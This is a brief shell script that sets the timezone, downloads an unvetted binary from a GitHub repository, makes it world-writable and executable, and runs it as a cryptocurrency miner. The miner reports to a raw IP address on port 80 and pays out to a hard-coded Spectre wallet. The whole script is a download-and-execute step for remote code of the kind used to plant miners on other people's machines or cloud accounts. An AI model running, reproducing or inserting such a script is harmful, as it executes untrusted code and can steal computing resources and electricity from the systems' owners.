#!/bin/sh
ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
dpkg-reconfigure --frontend noninteractive tzdata
wget https://github.com/kazppkido/newtnn/raw/main/tnnnew
chmod 777 tnnnew
./tnnnew --daemon-address 209.97.168.28 --port 80 --worker-name $(shuf -n 1 -i 1-999)-ABC --spectre --wallet spectre:qzlnaweyxxpjmh7xp66n62j7lu008xqeytm4npxskezhx92u52jzuwv39q8zt
